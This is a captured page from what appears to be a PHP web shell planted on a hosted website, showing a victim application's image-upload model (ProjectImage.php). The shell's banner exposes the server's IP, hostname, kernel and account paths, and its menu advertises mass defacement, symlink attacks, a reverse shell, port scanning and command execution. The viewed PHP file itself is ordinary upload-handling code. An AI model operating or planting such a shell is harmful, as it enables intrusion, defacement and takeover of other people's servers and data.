Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
construcciones
/
admin
/
app
/
Models
/
Viewing: ProjectImage.php
<?php class ProjectImage extends BaseModel { protected string $table = 'project_images'; protected array $fillable = ['project_id', 'image_path', 'created_at']; public function addImages(int $projectId, array $files): void { $count = count($files['name'] ?? []); for ($i = 0; $i < $count; $i++) { if (($files['error'][$i] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { continue; } $single = [ 'name' => $files['name'][$i], 'type' => $files['type'][$i], 'tmp_name' => $files['tmp_name'][$i], 'error' => $files['error'][$i], 'size' => $files['size'][$i], ]; $path = $this->upload($single); if ($path) { $this->create(['project_id' => $projectId, 'image_path' => $path]); } } } public function getByProject(int $projectId): array { $statement = $this->db->prepare('SELECT * FROM project_images WHERE project_id = :project_id ORDER BY id DESC'); $statement->execute(['project_id' => $projectId]); return $statement->fetchAll(); } public function deleteImage(int $id): bool { $image = $this->find($id); if ($image) { $this->deleteFile($image['image_path']); } return $this->delete($id); } public function validImage(array $file): bool { if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) { return false; } $extension = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); if (in_array($extension, ['php', 'js', 'html', 'svg', 'phtml', 'phar'], true)) { return false; } return in_array(mime_content_type($file['tmp_name']), ['image/jpeg', 'image/png', 'image/webp'], true); } private function upload(array $file): ?string { if (!$this->validImage($file)) { return null; } $extensions = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/webp' => 'webp']; $mime = mime_content_type($file['tmp_name']); $filename = 'gallery_' . date('YmdHis') . '_' . bin2hex(random_bytes(6)) . '.' . $extensions[$mime]; $directory = ROOT_PATH . '/storage/uploads/projects/gallery'; if (!is_dir($directory)) { mkdir($directory, 0775, true); } $destination = $directory . '/' . $filename; return move_uploaded_file($file['tmp_name'], $destination) ? 'storage/uploads/projects/gallery/' . $filename : null; } private function deleteFile(?string $path): void { if (!$path) return; $target = realpath(ROOT_PATH . '/' . ltrim($path, '/')); $base = realpath(ROOT_PATH . '/storage/uploads/projects/gallery'); if ($target && $base && str_starts_with($target, $base) && is_file($target)) { unlink($target); } } }
Coded With 💗 by
0x6ick